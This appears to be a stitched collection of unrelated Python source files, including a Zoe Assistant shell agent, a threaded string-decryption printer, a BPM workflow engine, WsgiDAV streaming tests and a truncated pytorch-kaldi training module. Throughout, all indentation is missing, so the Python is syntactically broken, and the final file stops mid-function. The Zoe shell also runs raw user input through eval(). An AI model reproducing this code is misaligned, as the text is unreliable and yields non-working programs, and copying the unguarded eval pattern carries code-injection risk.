print("Sequential Mechanism was",round((((end-start))-((endSeq-startSeq)))/(endSeq-startSeq),4),"% Faster")
if((endSeq-startSeq)==(end-start)):
print("Sequential and Paralell were same")
x_axis=["Seq Mech Time","Par Mech Time"]
y_axis=[round((endSeq-startSeq),4),round((end-start),4)]
ind=np.arange(len(x_axis))
print("Graph shows the times for Paralell and Sequential Mechanisms")
plt.bar(ind,y_axis)
plt.xticks(ind,x_axis)
if __name__ == "__main__":
main()
|
agent.py
|
# -*- coding: utf-8 -*-
#
# This file is part of Zoe Assistant
# Licensed under MIT license - see LICENSE file
#
from zoe import *
from colors import green, yellow
import threading
import logging
import json
import cmd
import sys
import os
def show(what):
return {
'intent': 'shell.show',
'payloads': [ what ]
}
def i(i):
return {
'data': 'integer',
'value': i
}
def s(s):
return {
'data': 'string',
'value': s
}
def user(name):
return {
'intent': 'user.get',
'name': name
}
def email(user, subject, text):
return {
'intent': 'mail.send',
'recipient': user,
'subject': subject,
'body': text
}
@Agent('Shell')
class ZoeShell(cmd.Cmd):
prompt = ''
def __init__(self):
super().__init__()
if not sys.stdout.isatty():
print('You are running this agent non interactively, which is not the idea :)')
print('If you are running it with docker-compose, try:')
print('\n docker-compose run zoe-agent-shell')
sys.exit(1)
self._thread = threading.Thread(target = self.cli, daemon = True)
self._thread.start()
@Intent('shell.show')
def receive(self, msg):
print(green(str(msg['payloads'])))
def cli(self):
print('Welcome to the Zoe shell!')
print('You can send Zoe commands like', green("email(user('someone'), 'subject', 'body')"))
print('This shell will translate those commands to the Zoe language and show the results when')
print('they are available.')
print(yellow('Please note that due to Kafka rebalancing, the first commands'))
print(yellow('can take a few seconds to be dispatched.'))
self.cmdloop()
def emptyline(self):
pass
def default(self, line):
try:
result = eval(line)
self.send(show(result))
except:
print('Error:', sys.exc_info())
|
main.py
|
#!/usr/bin/env python3
from argparse import ArgumentDefaultsHelpFormatter, ArgumentParser, FileType
from threading import Thread, Event
from queue import Empty, Queue
from lib.pastlylogger import PastlyLogger
from lib.worker import Worker
from lib.datamanager import DataManager
import time, sys
def fail_hard(*msg):
if msg: print(*msg, file=sys.stderr)
exit(1)
class WorkerFeeder():
def __init__(self, args, log, dm, end_event, name):
self._args, self._dm = args, dm
self._end_event = end_event
self._name = name
self.input = Queue(maxsize=1)
self.thread = Thread(target=self._enter)
self.thread.name = self._name
self.thread.start()
def wait(self):
assert self.thread != None
self.thread.join()
def _enter(self):
log('Starting WorkerFeeder',self._name)
self._worker = Worker(self._args, log, self._dm)
while not self.input.empty() or not self._end_event.is_set():
item = None
try: item = self.input.get(timeout=0.01)
except Empty: continue
if item:
direction, item = item
if direction == 'enc':
self._worker.process_enc(*item)
else:
self._worker.process_clear(*item)
log('Ending WorkerFeeder',self._name)
# block until one of the threads is available to take work, and return it
def get_next_worker_thread(threads):
while True:
for thr in threads:
if not thr.input.full():
return thr
time.sleep(0.01)
def wait_for_threads(threads):
for thr in threads:
while not thr.input.empty():
time.sleep(0.01)
def main(args):
global log
if args.debug:
log = PastlyLogger(info='/dev/stderr', overwrite=['info'],
log_threads=True)
else:
log = PastlyLogger(info='/dev/null', overwrite=['info'],
log_threads=True)
kill_worker_threads = Event()
kill_data_manager_thread = Event()
dm = DataManager(args, log, kill_data_manager_thread)
workers = [ WorkerFeeder(args, log, dm, kill_worker_threads,
'Worker-{}'.format(i)) for i in range(0, args.threads) ]
for enc in args.encrypted:
dm.init_data(l=len(enc))
for idx, char in enumerate(enc):
thr = get_next_worker_thread(workers)
thr.input.put( ('enc',(idx, char)) )
wait_for_threads(workers)
dm.print_data(times=args.times)
for clear in args.clear:
dm.init_data(l=len(clear))
for idx, char in enumerate(clear):
thr = get_next_worker_thread(workers)
thr.input.put( ('clear',(idx, char)) )
wait_for_threads(workers)
dm.print_data(times=args.times)
wait_for_threads(workers)
kill_worker_threads.set()
for thr in workers: thr.wait()
kill_data_manager_thread.set()
if __name__=='__main__':
DEF_ENC = ['Uryy1MQn6nMN0ny@6vp5M{Mc@6u10']
DEF_CLEAR = []
ALPHA, NUM = 'ABCDEFGHIJKLMNOPQRSTUVWXYZ', '0123456789',
ALPHA += ALPHA.lower()
SPECIAL = '!@#$%^&*()_-+=\|]}[{\'";:/?.>,< '
parser = ArgumentParser(
formatter_class=ArgumentDefaultsHelpFormatter)
parser.add_argument('-r','--times', metavar='NUM', type=int,
help='Number of times to repeat phrases', default=10)
parser.add_argument('-t','--threads', metavar='NUM', type=int,
help='Number of worker threads', default=8)
parser.add_argument('--debug', action='store_true',
help='Debug development')
parser.add_argument('-e','--encrypted', metavar='STR', type=str,
help='An encrypted string to decrypt and securely print',
action='append', default=DEF_ENC)
parser.add_argument('-c','--clear', metavar='STR', type=str,
help='A plain-text string to securely print',
action='append', default=DEF_CLEAR)
parser.add_argument('-d','--dictionary', metavar='STR', type=str,
help='A list of all possible characters',
default=ALPHA+NUM+SPECIAL)
args = parser.parse_args()
if args.encrypted != DEF_ENC or args.clear != DEF_CLEAR:
args.encrypted = args.encrypted[len(DEF_ENC):]
args.clear = args.clear[len(DEF_CLEAR):]
args.dictionary = [ c for c in args.dictionary ]
if args.threads < 1: fail_hard('Don\'t be stupid')
if args.times < 1: fail_hard('Don\'t be stupid')
exit(main(args))
|
core.py
|
from py_expression.core import Exp
from .base import *
import uuid
import threading
from multiprocessing import Process as ParallelProcess, process
class ProcessError(Exception):pass
class Object(object):pass
class ProcessSpec(object):pass
class Token(object):pass
"""
para la implementacion de python se usara un diccionario para almacenar
pero para la implementacion en go usar REDIS
"""
class TokenManager():
def __init__(self):
self._list={}
def create(self,process,parent=None,node=None,status='running')->Token:
token = Token()
token.id= str(uuid.uuid4())
token.process= process,
token.mainId = parent.mainId if parent!= None else token
token.parentId = parent.id if parent!= None else token
token.status= status
token.node = node
token.childs = []
return self.set(token)
def set(self,token:Token):
self._list[token.id] = token
return token
def get(self,key:str)-> Token:
return self._list[key]
def getChilds(self,parentId):
parent = self.get(parentId)
list = []
for childId in parent.childs:
list.append(self.get(childId))
return list
def update(self,token,data:dict):
for p in data:
setattr(token, p,data[p])
return self.set(token)
def delete(self,id:str):
del self._list[id]
def deleteChilds(self,parent):
for childId in parent.childs:
self.delete(childId)
parent.childs = []
return self.set(parent)
class ProcessParser():
def __init__(self,exp):
self.exp = exp
class BpmParser(ProcessParser):
def __init__(self,exp):
super(BpmParser,self).__init__(exp)
def parse(self,spec:dict)-> ProcessSpec:
process = ProcessSpec()
process.name= spec['name']
process.kind= spec['kind']
# TODO: el bind deberia estar definido en la vista y no en el proceso. esta pendiente resolverlo
process.bind = spec['bind'] if 'bind' in spec else []
process.input=self.parseInput(spec)
process.declare=self.parseDeclare(spec)
process.init=self.parseInit(spec)
process.vars=self.getVars(process)
process.nodes = {}
for key in spec['nodes']:
specNode=spec['nodes'][key]
specNode['name']=key
process.nodes[key] =self.parseNode(specNode)
for key in process.nodes:
node=process.nodes[key]
node.entries= self.getEntries(key,process.nodes)
return process
def parseInput(self,spec:dict):
input = []
if 'input' in spec:
for p in spec['input']:
param = Object()
param.name = p
param.type = spec['input'][p]
input.append(param)
return input
def parseDeclare(self,spec:dict):
declare = []
if 'declare' in spec:
for p in spec['declare']:
param = Object()
param.name = p
param.type = spec['declare'][p]
declare.append(param)
return declare
def parseInit(self,spec:dict):
init = Object()
if 'init' in spec:
init.expression = self.exp.parse(spec['init']['exp'])
else:
init.expression = None
return init
def getVars(self,process:ProcessSpec):
vars={}
for p in process.input:
var = Object
var.type=p.type
var.bind = True if p.name in process.bind else False
vars[p.name]=var
for p in process.declare:
var = Object
var.type=p.type
var.bind = True if p.name in process.bind else False
vars[p.name]=var
return vars
def getEntries(self,key,nodes):
list = []
for name in nodes:
node=nodes[name]
for t in node.transition:
if t.target == key:
s = Object()
s.source= node
s.transition = t
list.append(s)
return list
def parseNode(self,spec):
kind=spec['kind']
if kind == 'start':return self.parseNodeStart(spec)
elif kind == 'end':return self.parseNodeDefault(Object(),spec)
elif kind == 'task':return self.parseNodeTask(spec)
elif kind == 'exclusiveGateway':return self.parseNodeGateway(spec)
elif kind == 'inclusiveGateway':return self.parseNodeGateway(spec)
elif kind == 'parallelGateway':return self.parseNodeGateway(spec)
else: raise ProcessError('not found node kind :'+kind)
def parseNodeStart(self,spec):
node= self.parseNodeDefault(Object(),spec)
node.expression = self.exp.parse(spec['exp']) if 'exp' in spec else None
return node
def parseNodeTask(self,spec):
node= self.parseNodeDefault(Object(),spec)
node.expression= self.exp.parse(spec['exp']) if 'exp' in spec else None
return node
def parseNodeGateway(self,spec):
node= self.parseNodeDefault(Object(),spec)
node.key = spec['key'] if 'key' in spec else 'default'
return node
# TODO
def parseNodeScript(self,spec):pass
# TODO
def parseNodeEventGateway(self,spec):pass
# TODO
def parseNodeSubProcess(self,spec):pass
# TODO
def parseNodeUserTask(self,spec):pass
# TODO
def parseNodeServiceTask(self,spec):pass
# TODO
def parseNodeEventSignal(self,spec):pass
# TODO
def parseNodeStartSignal(self,spec):pass
# TODO
def parseNodeRaiseSignal(self,spec):pass
def parseNodeDefault(self,node,spec):
node.name = spec['name']
node.kind = spec['kind']
node.transition = self.parseTransition(spec)
return node
def parseTransition(self,spec):
transition = []
if 'transition' in spec:
for p in spec['transition']:
item = Object()
item.target = p['target']
item.expression = self.exp.parse(p['exp']) if 'exp' in p else None
transition.append(item)
return transition
class ProcessInstance:
def __init__(self,parent:str,spec:ProcessSpec,context:dict,tokenManager:TokenManager,exp:Exp):
self._id=None
self._parent=parent
self._context=context
self._status='ready'
self._spec=spec
self.tokenManager=tokenManager
self.exp = exp
self.init()
@property
def id(self):
return self._id
@id.setter
def id(self,value):
self._id=value
@property
def parent(self):
return self._parent
@property
def spec(self):
return self._spec
@property
def context(self):
return self._context
def init(self):
if self._spec.init.expression != None:
self.exp.eval(self._spec.init.expression,self._context)
class BpmInstance(ProcessInstance):
def __init__(self,parent:str,spec:ProcessSpec,context:dict,tokenManager:TokenManager,exp:Exp):
super(BpmInstance,self).__init__(parent,spec,context,tokenManager,exp)
def start(self,parent=None):
self._status='running'
starts = dict(filter(lambda p: p[1].kind == 'start', self._spec.nodes.items()))
target=None
for name in starts:
p = starts[name]
if p.expression != None:
if self.exp.eval(p.expression,self._context):
target= name
break
else:
target= name
break
if target == None: raise ProcessError('not found start node enabled')
token=self.tokenManager.create(process=self._spec.name,parent=parent,node=target)
self.execute(token)
def stop(self):
self._status='stopping'
def pause(self):
self._status='pausing'
def execute(self,token):
if self._status=='running':
node=self._spec.nodes[token.node]
# self._context['__current']={'name':node.name ,'kind': node.kind }
if node.kind == 'start': self.nextNode(node,token)
elif node.kind == 'task': self.executeTask(node,token)
elif node.kind == 'end': self.executeEnd(node,token)
elif node.kind == 'exclusiveGateway':self.nextNode(node,token)
elif node.kind == 'inclusiveGateway':self.executeInclusiveGateway(node,token)
elif node.kind == 'parallelGateway':self.executeParallelGateway(node,token)
else: raise ProcessError('not found node kind :'+node.kind)
# self._context['__last']={'name':node.name ,'kind': node.kind}
elif self._status=='pausing':
self._status='paused'
elif self._status=='stopping':
self._status='stopped'
def executeEnd(self,node,token):
token=self.tokenManager.update(token,{'status':'end'})
def executeTask(self,node,token):
try:
self.exp.eval(node.expression,self._context)
except Exception as ex:
print(ex)
raise
self.nextNode(node,token)
def executeInclusiveGateway(self,node,token):
subToken=False
pending = False
if len(node.entries) > 1:
if token.parentId != None:
childs = self.tokenManager.getChilds(token.parentId)
subToken=True
token=self.tokenManager.update(token,{'status':'end'})
for child in childs:
if child.id != token.id and child.status != 'end':
pending=True
break
if subToken:
if pending: return
else:
parent = self.tokenManager.get(token.parentId)
parent = self.tokenManager.deleteChilds(parent)
token = parent
targets=self.getTargets(node,onlyFirst=False)
if len(targets) == 1:
token=self.tokenManager.update(token,{'node':targets[0],'status':'ready'})
self.execute(token)
else:
for target in targets:
child=self.tokenManager.create(process=self._spec.name,parent=token,node=target)
token.childs.append(child)
token=self.tokenManager.update(token,{'childs':token.childs,'status':'await'})
for child in token.childs:
self.execute(token)
# https://stackoverflow.com/questions/7207309/how-to-run-functions-in-parallel
# https://stackoverflow.com/questions/1559125/string-arguments-in-python-multiprocessing
def executeParallelGateway(self,node,token):
subToken=False
pending = False
if len(node.entries) > 1:
if token.parentId != None:
childs = self.tokenManager.getChilds(token.parentId)
if len(childs) > 1 :
subToken=True
token=self.tokenManager.update(token,{'status':'end'})
token.thread.join()
for child in childs:
if child.id != token.id and child.status != 'end':
pending=True
break
if subToken:
if pending: return
else:
parent = self.tokenManager.get(token.parentId)
parent = self.tokenManager.deleteChilds(parent)
token=parent
targets=self.getTargets(node,onlyFirst=False)
if len(targets) == 1:
token=self.tokenManager.update(token,{'node':targets[0],'status':'ready'})
self.execute(token)
else:
for target in targets:
child=self.tokenManager.create(process=self._spec.name,parent=token,node=target)
thread = ParallelProcess(target=self.execute ,args=(token,))
child=self.tokenManager.update(child,{'thread':thread})
token.childs.append(child)
token=self.tokenManager.update(token,{'childs':token.childs,'status':'await'})
for child in token.childs:
child.thread.start()
def nextNode(self,node,token):
targets=self.getTargets(node)
token=self.tokenManager.update(token,{'node':targets[0] })
self.execute(token)
def getTargets(self,node,onlyFirst=True):
targets=[]
for p in node.transition:
if p.expression != None:
if self.exp.eval(p.expression,self._context):
targets.append(p.target)
if onlyFirst:break
else:
targets.append(p.target)
if onlyFirst:break
if len(targets) == 0:
raise ProcessError('node '+node.name+' not found targets')
return targets
class ProcessInstanceFactory():
def __init__(self,tokenManager:TokenManager,exp:Exp):
self.tokenManager = tokenManager
self.exp = exp
def create(self,spec:ProcessSpec,context:dict,parent=None)-> ProcessInstance:
pass
class BpmInstanceFactory(ProcessInstanceFactory):
def __init__(self,tokenManager:TokenManager,exp:Exp):
super(BpmInstanceFactory,self).__init__(tokenManager,exp)
def create(self,spec:ProcessSpec,context:dict,parent=None)-> ProcessInstance:
return BpmInstance(parent,spec,context,self.tokenManager,self.exp)
class Process(metaclass=Singleton):
def __init__(self):
self._parsers={}
self._instanceFactory={}
self._specs={}
self._instances= {}
self.exp= Exp()
self.tokenManager = TokenManager()
self.init()
def init(self):
self.addParser('bpm',BpmParser)
self.addInstanceFactory('bpm',BpmInstanceFactory)
def addParser(self,key:str,parser:ProcessParser):
self._parsers[key] = parser(self.exp)
def addInstanceFactory(self,key:str,factory:ProcessInstanceFactory):
self._instanceFactory[key] = factory(self.tokenManager,self.exp)
def AddSpec(self,key:str,spec:dict)-> ProcessSpec:
processSpec =self.parse(key,spec)
self._specs[key] =processSpec
return processSpec
def parse(self,key:str,spec:dict)-> ProcessSpec:
spec['name'] = key
kind =spec['kind']
if kind not in self._parsers: raise ProcessError('not found parser kind :'+kind)
return self._parsers[kind].parse(spec)
def createInstance(self,spec:ProcessSpec,context:dict,parent=None)-> ProcessInstance:
if spec.kind not in self._instanceFactory: raise ProcessError('not found instance factory kind :'+spec.kind)
instance=self._instanceFactory[spec.kind].create(spec,context,parent)
instance.id = str(uuid.uuid4())
return instance
def create(self,key:str,context:dict,parent=None)-> ProcessInstance:
spec=self._specs[key]
return self.createInstance(spec,context,parent)
# https://www.genbeta.com/desarrollo/multiprocesamiento-en-python-threads-a-fondo-introduccion
# https://rico-schmidt.name/pymotw-3/threading/
def start(self,instance:ProcessInstance,sync=False):
try:
thread = threading.Thread(target=self._process_start, args=(instance,))
self._instances[instance.id]= {"instance":instance,"thread":thread }
if not sync: thread.setDaemon(True)
thread.start()
if sync: thread.join()
except Exception as ex:
print(ex)
raise
def stop(self,id):
self._instances[id]['instance'].stop()
def pause(self,id):
self._instances[id]['instance'].pause()
def _process_start(self,instance:ProcessInstance):
instance.start()
def getInstance(self,id)->ProcessInstance:
return self._instances[id]
|
test_streaming.py
|
# -*- coding: utf-8 -*-
# (c) 2009-2021 Martin Wendt and contributors; see WsgiDAV https://github.com/mar10/wsgidav
# Licensed under the MIT license:
# http://www.opensource.org/licenses/mit-license.php
"""
Unit tests for wsgidav.stream_tools.FileLikeQueue
"""
import os
import threading
import unittest
from tempfile import gettempdir
import requests
from tests.util import Timing, WsgiDavTestServer, write_test_file
from wsgidav import util
from wsgidav.dav_provider import DAVNonCollection, DAVProvider
from wsgidav.stream_tools import FileLikeQueue
# ----------------------------------------------------------------------------
# Dummy DAVProvider implementation
#
# Note that this code runs in a separated process, spawned by the unit tests.
class MockProxyResource(DAVNonCollection):
"""
A simple _DAVResource that handles PUT requests by passing a FileLikeQueue
to the server and asynchronuosly pipes the incoming data stream to a target
file.
"""
def __init__(self, path, environ, target_path):
super().__init__(path, environ)
self.target_path = target_path
self.worker = None
def get_content(self): # Keep ABC happy
raise NotImplementedError
def get_content_length(self): # Keep ABC happy
raise NotImplementedError
def get_etag(self):
return None
def support_etag(self):
return False
def begin_write(self, *, content_type=None):
# print("begin_write: {}".format(self.target_path))
queue = FileLikeQueue(max_size=1)
# Simulate an asynchrounous consumer. We use a file, so we can check
# the result from the parent unittest process. In real live this could be
# requests.post(..., data=queue), ...
def _consumer():
# print("_consumer: {}".format(self.target_path))
with open(self.target_path, "wb") as f:
s = 0
# print("_consumer: read()...")
data = queue.read()
while data:
s += len(data)
# print("_consumer: read(): write")
f.write(util.to_bytes(data))
data = queue.read()
# print("_consumer(): done", s)
self.worker = threading.Thread(target=_consumer)
self.worker.setDaemon(True)
self.worker.start()
return queue
def end_write(self, *, with_errors):
print("end_write: {}".format(self.target_path))
self.worker.join()
class MockProxyProvider(DAVProvider):
"""
A simple DAVProvider that returns a dummy MockProxyResource for all requests.
"""
def __init__(self, target_path):
super().__init__()
self.target_path = target_path
def get_resource_inst(self, path, environ):
print("get_resource_inst", path)
res = MockProxyResource(path, environ, self.target_path)
if path == "/": # if server asks for the parent collection, fake one
res.is_collection = True
return res
# ========================================================================
# BasicTest
# ========================================================================
class BasicTest(unittest.TestCase):
def setUp(self):
self.SIZE = 10 * 1000 * 1000
self.test_file = write_test_file("source.txt", self.SIZE)
self.target_path = os.path.join(gettempdir(), "target.txt")
self.provider = MockProxyProvider(self.target_path)
def tearDown(self):
os.remove(self.test_file)
if os.path.isfile(self.target_path):
os.remove(self.target_path)
self.provider = None
def testFileLikeQueueUnsized(self):
# queue of unlimited size
q = FileLikeQueue()
q.write(b"*" * 42)
q.write(b"*" * 3)
# unsized reads will return chunks as queued
res = q.read()
self.assertEqual(len(res), 42)
res = q.read()
self.assertEqual(len(res), 3)
q.close() # subsequent reads will return "" instead of blocking
res = q.read()
self.assertEqual(res, b"", "Read after close() returns ''")
# subsequent write will raise
self.assertRaises(ValueError, q.write, b"***")
def testFileLikeQueue(self):
# queue of unlimited size
q = FileLikeQueue()
# queue 32 bytes
q.write(b"*" * 7)
q.write(b"*" * 11)
q.write(b"*" * 5)
q.write(b"*" * 9)
q.close()
# sized reads will return chunks as demanded
for _ in range(6):
self.assertEqual(len(q.read(5)), 5)
self.assertEqual(len(q.read(5)), 2, "last chunk delivers the reminder")
self.assertEqual(len(q.read(5)), 0, "further read() returns ''")
# self.assertEqual(q.size, 0)
def testFileLikeQueueAll(self):
# queue of unlimited size
q = FileLikeQueue()
# queue 32 bytes
q.write(b"*" * 7)
q.write(b"*" * 11)
q.write(b"*" * 5)
q.write(b"*" * 9)
q.close()
# read(-1) returns all, then ''
self.assertEqual(len(q.read(-1)), 32)
self.assertEqual(len(q.read(-1)), 0)
def testStream(self):
with WsgiDavTestServer(provider=self.provider):
with Timing("testStream", self.SIZE):
with open(self.test_file, "rb") as f:
r = requests.put("http://127.0.0.1:8080/bar.txt", data=f)
self.assertEqual(r.status_code, 204)
self.assertEqual(os.path.getsize(self.target_path), self.SIZE)
# def testStreamBlob(self):
# with WsgiDavTestServer(provider=self.provider):
# with Timing("testStream", self.SIZE):
# blob = b"*" * self.SIZE
# r = requests.put("http://127.0.0.1:8080/bar.txt", data=blob)
# self.assertEqual(r.status_code, 204)
# self.assertEqual(os.path.getsize(self.target_path), self.SIZE)
# def testStreamChunked(self):
# with WsgiDavTestServer(provider=self.provider):
# with Timing("testStream", self.SIZE):
# def _print_url(r, *args, **kwargs):
# print(r.url)
# def _generate():
# with open(self.test_file, "rb") as f:
# while True:
# out = f.read(1000*1000)
# if not out:
# break
# yield out
# r = requests.put("http://127.0.0.1:8080/bar.txt",
# data=_generate(),
# # headers={"Content-Length": str(self.SIZE)},
# hooks=dict(response=_print_url))
# self.assertEqual(r.status_code, 204)
# self.assertEqual(os.path.getsize(self.target_path), self.SIZE)
# ========================================================================
if __name__ == "__main__":
unittest.main()
|
core.py
|
##########################################################
# pytorch-kaldi v.0.1
# Mirco Ravanelli, Titouan Parcollet
# Mila, University of Montreal
# October 2018
##########################################################
import sys
import configparser
import os
from utils import is_sequential_dict, model_init, optimizer_init, forward_model, progress
from data_io import load_counts
import numpy as np
import random
import torch
from distutils.util import strtobool
import time
import threading
import torch
from data_io import read_lab_fea, open_or_fd, write_mat
from utils import shift
def read_next_chunk_into_shared_list_with_subprocess(
read_lab_fea, shared_list, cfg_file, is_production, output_folder, wait_for_process
):
p = threading.Thread(target=read_lab_fea, args=(cfg_file, is_production, shared_list, output_folder))
p.start()
if wait_for_process:
p.join()
return None
else:
return p
def extract_data_from_shared_list(shared_list):
data_name = shared_list[0]
data_end_index_fea = shared_list[1]
data_end_index_lab = shared_list[2]
fea_dict = shared_list[3]
lab_dict = shared_list[4]
arch_dict = shared_list[5]
data_set = shared_list[6]
return data_name, data_end_index_fea, data_end_index_lab, fea_dict, lab_dict, arch_dict, data_set
def convert_numpy_to_torch(data_set_dict, save_gpumem, use_cuda):
if not (save_gpumem) and use_cuda:
data_set_inp = torch.from_numpy(data_set_dict["input"]).float().cuda()
data_set_ref = torch.from_numpy(data_set_dict["ref"]).float().cuda()
else:
data_set_inp = torch.from_numpy(data_set_dict["input"]).float()
data_set_ref = torch.from_numpy(data_set_dict["ref"]).float()
data_set_ref = data_set_ref.view((data_set_ref.shape[0], 1))
return data_set_inp, data_set_ref
def run_nn_refac01(
data_name, data_set, data_end_index, fea_dict, lab_dict, arch_dict, cfg_file, processed_first, next_config_file
):
def _read_chunk_specific_config(cfg_file):
if not (os.path.exists(cfg_file)):
sys.stderr.write("ERROR: The config file %s does not exist!\n" % (cfg_file))
sys.exit(0)
else:
config = configparser.ConfigParser()
config.read(cfg_file)
return config
def _get_batch_size_from_config(config, to_do):
if to_do == "train":
batch_size = int(config["batches"]["batch_size_train"])
elif to_do == "valid":
batch_size = int(config["batches"]["batch_size_valid"])
elif to_do == "forward":
batch_size = 1
return batch_size
def _initialize_random_seed(config):
seed = int(config["exp"]["seed"])
torch.manual_seed(seed)
random.seed(seed)
np.random.seed(seed)
def _load_model_and_optimizer(fea_dict, model, config, arch_dict, use_cuda, multi_gpu, to_do):
inp_out_dict = fea_dict
nns, costs = model_init(inp_out_dict, model, config, arch_dict, use_cuda, multi_gpu, to_do)
optimizers = optimizer_init(nns, config, arch_dict)
for net in nns.keys():
pt_file_arch = config[arch_dict[net][0]]["arch_pretrain_file"]
if pt_file_arch != "none":
if use_cuda:
checkpoint_load = torch.load(pt_file_arch)
else:
checkpoint_load = torch.load(pt_file_arch, map_location="cpu")
nns[net].load_state_dict(checkpoint_load["model_par"])
if net in optimizers:
optimizers[net].load_state_dict(checkpoint_load["optimizer_par"])
optimizers[net].param_groups[0]["lr"] = float(
config[arch_dict[net][0]]["arch_lr"]
) # loading lr of the cfg file for pt
if multi_gpu:
nns[net] = torch.nn.DataParallel(nns[net])
return nns, costs, optimizers, inp_out_dict
def _open_forward_output_files_and_get_file_handles(forward_outs, require_decodings, info_file, output_folder):
post_file = {}
for out_id in range(len(forward_outs)):
if require_decodings[out_id]:
out_file = info_file.replace(".info", "_" + forward_outs[out_id] + "_to_decode.ark")
else:
out_file = info_file.replace(".info", "_" + forward_outs[out_id] + ".ark")
post_file[forward_outs[out_id]] = open_or_fd(out_file, output_folder, "wb")
return post_file
def _get_batch_config(data_set_input, seq_model, to_do, data_name, batch_size):
N_snt = None
N_ex_tr = None
N_batches = None
if seq_model or to_do == "forward":
N_snt = len(data_name)
N_batches = int(N_snt / batch_size)
else:
N_ex_tr = data_set_input.shape[0]
N_batches = int(N_ex_tr / batch_size)
return N_snt, N_ex_tr, N_batches
def _prepare_input(
snt_index,
batch_size,
inp_dim,
ref_dim,
beg_snt_fea,
beg_snt_lab,
data_end_index_fea,
data_end_index_lab,
beg_batch,
end_batch,
seq_model,
arr_snt_len_fea,
arr_snt_len_lab,
data_set_inp,
data_set_ref,
use_cuda,
):
def _zero_padding(
inp,
ref,
max_len_fea,
max_len_lab,
data_end_index_fea,
data_end_index_lab,
data_set_inp,
data_set_ref,
beg_snt_fea,
beg_snt_lab,
snt_index,
k,
):
def _input_and_ref_have_same_time_dimension(N_zeros_fea, N_zeros_lab):
if N_zeros_fea == N_zeros_lab:
return True
return False
snt_len_fea = data_end_index_fea[snt_index] - beg_snt_fea
snt_len_lab = data_end_index_lab[snt_index] - beg_snt_lab
N_zeros_fea = max_len_fea - snt_len_fea
N_zeros_lab = max_len_lab - snt_len_lab
if _input_and_ref_have_same_time_dimension(N_zeros_fea, N_zeros_lab):
N_zeros_fea_left = random.randint(0, N_zeros_fea)
N_zeros_lab_left = N_zeros_fea_left
else:
N_zeros_fea_left = 0
N_zeros_lab_left = 0
inp[N_zeros_fea_left : N_zeros_fea_left + snt_len_fea, k, :] = data_set_inp[
beg_snt_fea : beg_snt_fea + snt_len_fea, :
]
ref[N_zeros_lab_left : N_zeros_lab_left + snt_len_lab, k, :] = data_set_ref[
beg_snt_lab : beg_snt_lab + snt_len_lab, :
]
return inp, ref, snt_len_fea, snt_len_lab
if len(data_set_ref.shape) == 1:
data_set_ref = data_set_ref.shape.view((data_set_ref.shape[0], 1))
max_len = 0
if seq_model:
max_len_fea = int(max(arr_snt_len_fea[snt_index : snt_index + batch_size]))
max_len_lab = int(max(arr_snt_len_lab[snt_index : snt_index + batch_size]))
inp = torch.zeros(max_len_fea, batch_size, inp_dim).contiguous()
ref = torch.zeros(max_len_lab, batch_size, ref_dim).contiguous()
for k in range(batch_size):
inp, ref, snt_len_fea, snt_len_lab = _zero_padding(
inp,
ref,
max_len_fea,
max_len_lab,
data_end_index_fea,
data_end_index_lab,
data_set_inp,
data_set_ref,
beg_snt_fea,
beg_snt_lab,
snt_index,
k,
)
beg_snt_fea = data_end_index_fea[snt_index]
beg_snt_lab = data_end_index_lab[snt_index]
snt_index = snt_index + 1
else:
if to_do != "forward":
inp = data_set[beg_batch:end_batch, :].contiguous()
else:
snt_len_fea = data_end_index_fea[snt_index] - beg_snt_fea
snt_len_lab = data_end_index_lab[snt_index] - beg_snt_lab
inp = data_set_inp[beg_snt_fea : beg_snt_fea + snt_len_fea, :].contiguous()
ref = data_set_ref[beg_snt_lab : beg_snt_lab + snt_len_lab, :].contiguous()
beg_snt_fea = data_end_index_fea[snt_index]
beg_snt_lab = data_end_index_lab[snt_index]
snt_index = snt_index + 1
if use_cuda:
inp = inp.cuda()
ref = ref.cuda()
return inp, ref, max_len_fea, max_len_lab, snt_len_fea, snt_len_lab, beg_snt_fea, beg_snt_lab, snt_index
def _optimization_step(optimizers, outs_dict, config, arch_dict):
for opt in optimizers.keys():
optimizers[opt].zero_grad()
outs_dict["loss_final"].backward()
for opt in optimizers.keys():
if not (strtobool(config[arch_dict[opt][0]]["arch_freeze"])):
optimizers[opt].step()
def _update_progress_bar(to_do, i, N_batches, loss_sum):
if to_do == "train":
status_string = (
"Training | (Batch "
+ str(i + 1)
+ "/"
+ str(N_batches)
+ ")"
+ " | L:"
+ str(round(loss_sum.cpu().item() / (i + 1), 3))
)
if i == N_batches - 1:
status_string = "Training | (Batch " + str(i + 1) + "/" + str(N_batches) + ")"
if to_do == "valid":
status_string = "Validating | (Batch " + str(i + 1) + "/" + str(N_batches) + ")"
if to_do == "forward":
status_string = "Forwarding | (Batch " + str(i + 1) + "/" + str(N_batches) + ")"
progress(i, N_batches, status=status_string)
def _write_info_file(info_file, to_do, loss_tot, err_tot, elapsed_time_chunk):
with open(info_file, "w") as text_file:
text_file.write("[results]\n")
if to_do != "forward":
text_file.write("loss=%s\n" % loss_tot.cpu().numpy())
text_file.write("err=%s\n" % err_tot.cpu().numpy())
text_file.write("elapsed_time_chunk=%f\n" % elapsed_time_chunk)
text_file.close()
def _save_model(to_do, nns, multi_gpu, optimizers, info_file, arch_dict):
if to_do == "train":
for net in nns.keys():
checkpoint = {}
if multi_gpu:
checkpoint["model_par"] = nns[net].module.state_dict()
else:
checkpoint["model_par"] = nns[net].state_dict()
if net in optimizers:
checkpoint["optimizer_par"] = optimizers[net].state_dict()
else:
checkpoint["optimizer_par"] = dict()
out_file = info_file.replace(".info", "_" + arch_dict[net][0] + ".pkl")
torch.save(checkpoint, out_file)
def _get_dim_from_data_set(data_set_inp, data_set_ref):
inp_dim = data_set_inp.shape[1]
ref_dim = 1
if len(data_set_ref.shape) > 1:
ref_dim = data_set_ref.shape[1]
return inp_dim, ref_dim
from data_io import read_lab_fea_refac01 as read_lab_fea
from utils import forward_model_refac01 as forward_model
config = _read_chunk_specific_config(cfg_file)
_initialize_random_seed(config)
output_folder = config["exp"]["out_folder"]
use_cuda = strtobool(config["exp"]["use_cuda"])
multi_gpu = strtobool(config["exp"]["multi_gpu"])
to_do = config["exp"]["to_do"]
info_file = config["exp"]["out_info"]
model = config["model"]["model"].split("\n")
forward_outs = config["forward"]["forward_out"].split(",")
forward_normalize_post = list(map(strtobool, config["forward"]["normalize_posteriors"].split(",")))
forward_count_files = config["forward"]["normalize_with_counts_from"].split(",")
require_decodings = list(map(strtobool, config["forward"]["require_decoding"].split(",")))
save_gpumem = strtobool(config["exp"]["save_gpumem"])
is_production = strtobool(config["exp"]["production"])
